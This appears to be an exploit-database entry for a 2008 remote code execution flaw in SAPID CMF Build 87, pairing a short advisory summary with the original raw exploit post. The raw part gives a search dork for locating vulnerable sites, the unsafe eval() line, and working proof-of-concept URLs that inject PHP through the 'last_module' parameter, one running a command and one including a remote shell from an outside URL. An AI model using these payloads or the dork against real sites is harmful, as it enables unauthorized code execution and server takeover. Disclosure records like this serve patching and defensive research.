SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability

vendor:

SAPID CMF Build 87 (last_module)

by:

TrYaGi

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: SAPID CMF Build 87 (last_module)

Affected Version From: Build 87

Affected Version To: Build 87

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability

A vulnerability exists in SAPID CMF Build 87 (last_module) which allows remote attackers to execute arbitrary code. This is due to the application failing to properly sanitize user-supplied input to the 'last_module' parameter of the 'adodb-perf-module.inc.php' script. An attacker can exploit this vulnerability by passing a malicious payload to the 'last_module' parameter, which will be executed by the vulnerable script.

Mitigation:

Upgrade to the latest version of SAPID CMF Build 87 (last_module) or apply the appropriate patch.

Source

Exploit-DB raw data:

### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09:  */

eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)

# milw0rm.com [2008-02-10]